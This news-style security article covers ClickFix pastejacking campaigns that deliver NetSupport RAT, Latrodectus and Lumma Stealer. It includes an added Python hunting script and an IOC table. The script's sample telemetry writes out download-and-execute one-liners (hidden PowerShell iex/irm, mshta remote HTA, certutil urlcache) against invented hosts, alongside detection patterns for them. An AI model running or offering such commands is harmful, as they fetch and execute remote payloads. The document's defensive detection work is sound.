A new wave of malware delivery campaigns leveraging the “ClickFix” social engineering technique is causing alarm across cybersecurity circles in 2025.
Multiple threat actors are actively exploiting this method to distribute remote access tools (RATs) and infostealers, notably NetSupport RAT, Latrodectus, and Lumma Stealer, across diverse industries such as technology, finance, manufacturing, retail, legal, utilities, and government.
Security researchers at Palo Alto Networks’ Unit 42 have tracked nearly a dozen incidents where ClickFix lures served as the initial access vector, underscoring the growing threat posed by this approach.
Deceptive Fixes Enable Full Compromise
Unlike conventional phishing or drive-by downloads, ClickFix attacks depend on user participation.
Attackers pose as legitimate technical support or product verification systems, urgently advising users to perform “quick fixes” for common issues via simple step-by-step instructions.
Victims are directed to use keyboard shortcuts such as Windows Key + R or Win+X to open the Run dialog or a terminal window and paste the clipboard contents, which, unbeknownst to them, are malicious PowerShell or MSHTA commands placed there by malicious JavaScript on the lure page.
This “pastejacking” ploy tricks targets into executing malware loaders directly, bypassing many traditional detection mechanisms since there’s no malicious attachment or obvious exploit involved.
Recent campaigns have demonstrated significant innovation, with threat actors delivering a range of payloads through compromised websites, malvertising, and fake support forums.
Researchers identified that these techniques are being integrated into infection chains of high-profile malware families, namely NetSupport RAT, Latrodectus, and Lumma Stealer, to devastating effect.
Lumma Stealer Campaigns Escalate
Research reveals that NetSupport RAT operators, active in May 2025, are deploying their malware using fake-verification landing pages spoofing brands such as DocuSign and Okta.
Victims are lured into running malicious PowerShell via ClickFix, which downloads multi-stage payloads starting with a ZIP archive containing a legitimate Java component (jp2launcher.exe) that subsequently sideloads a new malicious DLL loader (msvcp140.dll), ultimately installing NetSupport RAT for remote control and data exfiltration.
Latrodectus actors, active since March 2025, have switched towards ClickFix for initial access, with infection chains initiated by compromised sites redirecting users through ClearFake JavaScript frameworks.
This tactic places fake verification windows prompting users to paste and run clipboard content, after which a short PowerShell/cURL command downloads and executes an obfuscated JavaScript dropper.
The workflow ultimately deploys Latrodectus as a malicious DLL, loaded via sideloading into a legitimate process.
Similarly, Lumma Stealer campaigns have accelerated, with a marked increase in attempts traced to April 2025.
These operations focus on delivering unique MSHTA commands for each target, which direct execution to typosquatted IP logging and C2 domains.
The subsequent PowerShell script downloads a new loader that leverages AutoIt scripting and a Microsoft CAB archive to construct the Lumma Stealer payload.
Security software detection measures, such as searching for process names tied to known EDR and antivirus software, are employed to circumvent protective technologies before deploying the infostealer.
For defenders, detecting ClickFix infections can be challenging due to the lack of traditional indicators.
However, artifacts like suspicious entries in Windows registry’s RunMRU key, anomalous process launches via Win+X and clipboard activity, as well as distinctive telemetry patterns involving explorer.exe, powershell.exe, certutil.exe, mshta.exe, or rundll32.exe, can serve as hunting leads.
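The hunting leads above can be turned into simple telemetry logic. The following is an added example, not code from the article or from Unit 42: it scores constructed process-creation events (parent image, child image, command line, as an EDR or Sysmon would record them) and constructed values from the per-user RunMRU key, flagging the pattern the article describes, namely explorer.exe directly launching powershell.exe, mshta.exe, certutil.exe or rundll32.exe with download-and-execute style arguments. Domain names, paths and registry values in the samples are made up; the indicator patterns are generic and not specific to any one campaign.

```python
"""Hunt for ClickFix-style execution artifacts in constructed telemetry.

Two sources are modelled (all sample data is constructed for illustration):
  1. Process-creation events (parent image, child image, command line).
  2. Values under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
     which Windows writes each time a command is submitted through the Win+R Run
     dialog; each value ends in "\\1" and "MRUList" orders them, most recent first.
"""
import re
from dataclasses import dataclass

# Executables the article names in ClickFix telemetry (stems, without ".exe").
LOLBINS = {"powershell", "mshta", "certutil", "rundll32", "cmd", "curl"}
# Interactive shells that should not normally be the direct parent of those binaries.
INTERACTIVE_PARENTS = {"explorer"}

# (regex applied to the lower-cased command line, human-readable reason)
SUSPICIOUS_CMD_PATTERNS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(p|xecutionpolicy)?\s+bypass", "execution policy bypass"),
    (r"\b(iex|invoke-expression)\b", "in-memory expression evaluation"),
    (r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", "web download"),
    (r"mshta(\.exe)?\s+https?://", "mshta remote HTA"),
    (r"certutil(\.exe)?.*-(urlcache|decode)", "certutil download/decode"),
    (r"https?://", "URL in command line"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _stem(path: str) -> str:
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta'."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def score_command_line(cmd: str) -> list[str]:
    """Return the reasons (labels) for which a command line looks suspicious."""
    cmd_l = cmd.lower()
    return [label for pat, label in SUSPICIOUS_CMD_PATTERNS if re.search(pat, cmd_l)]


def hunt_process_events(events):
    """Return [(event, reasons)] for events worth an analyst's attention."""
    findings = []
    for ev in events:
        parent, child = _stem(ev.parent_image), _stem(ev.image)
        if child not in LOLBINS:
            continue
        reasons = score_command_line(ev.command_line)
        if parent in INTERACTIVE_PARENTS:
            reasons.insert(0, f"{child} spawned directly by {parent} (Win+R/Win+X paste pattern)")
        if reasons:
            findings.append((ev, reasons))
    return findings


def hunt_runmru(runmru: dict) -> list:
    """Return [(value_name, command, reasons)] for suspicious Run-dialog history,
    most recent entry first according to MRUList."""
    order = runmru.get("MRUList", "")
    names = list(order) + [n for n in runmru if n not in order and n != "MRUList"]
    findings = []
    for name in names:
        raw = runmru.get(name, "")
        entry = raw[:-2] if raw.endswith("\\1") else raw   # strip the trailing "\1"
        tokens = entry.split()
        if not tokens:
            continue
        reasons = score_command_line(entry)
        if _stem(tokens[0].strip('"')) in LOLBINS or reasons:
            findings.append((name, entry, reasons))
    return findings


# ---- constructed sample telemetry (hosts, domains and paths are invented) ----
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_EXE,
                 'powershell -w hidden -ep bypass -c "iex (irm http://verify.example.invalid/fix.txt)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://check.example.invalid/a.hta"),
    ProcessEvent(PS_EXE, r"C:\Windows\System32\certutil.exe",
                 "certutil -urlcache -split -f http://dl.example.invalid/p.cab p.cab"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS_EXE,
                 r"powershell -File C:\scripts\backup.ps1"),  # routine admin script, not flagged
]
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm http://verify.example.invalid/fix.txt)"\\1',
    "c": "mshta http://check.example.invalid/a.hta\\1",
}

if __name__ == "__main__":
    for ev, reasons in hunt_process_events(SAMPLE_EVENTS):
        print(f"[process] {_stem(ev.parent_image)} -> {_stem(ev.image)}: {', '.join(reasons)}")
    for name, entry, reasons in hunt_runmru(SAMPLE_RUNMRU):
        print(f"[RunMRU {name}] {entry}: {', '.join(reasons)}")
```

On a real host the RunMRU values would be read with the registry API (for example `winreg` on Windows) and the process events pulled from the EDR or Sysmon Event ID 1; the scoring logic is the same. The benign control events (notepad from the Run dialog, a scheduled PowerShell script started by cmd.exe) show that the rule keys on the combination of parent, child and arguments rather than on powershell.exe alone.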
Palo Alto Networks points to its suite of products Advanced WildFire, Advanced URL Filtering and DNS Security, Cortex XDR, and XSIAM as effective in mitigating ClickFix threats. Nonetheless, raising user awareness and enacting robust monitoring remains crucial, as attackers continue to refine their approaches.
Indicators of Compromise (IOC)

| Malware | Filename/Description | IOC/Hash/Domain |
|---|---|---|
| Lumma Stealer | PartyContinued.exe | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef |
| Lumma Stealer | Boat.pst (CAB archive) | 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7 |
| Lumma Stealer | Malicious domains | iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, pub-*.r2[.]dev, agroeconb[.]live, animatcxju[.]live |
| Latrodectus | libecf.dll | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 |
| Latrodectus | C2 URLs | webbs[.]live, diab[.]live, mhbr[.]live, decr[.]live, lexip[.]live, rimz[.]live, byjs[.]live, btco[.]live, izan[.]live, k.veuwb[.]live, r.netluc[.]live, heyues[.]live, mailam[.]live |
| NetSupport RAT | data_3.bin, data_4.bin | 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D, 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288 |
| NetSupport RAT | msvcp140.dll (loader) | CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527 |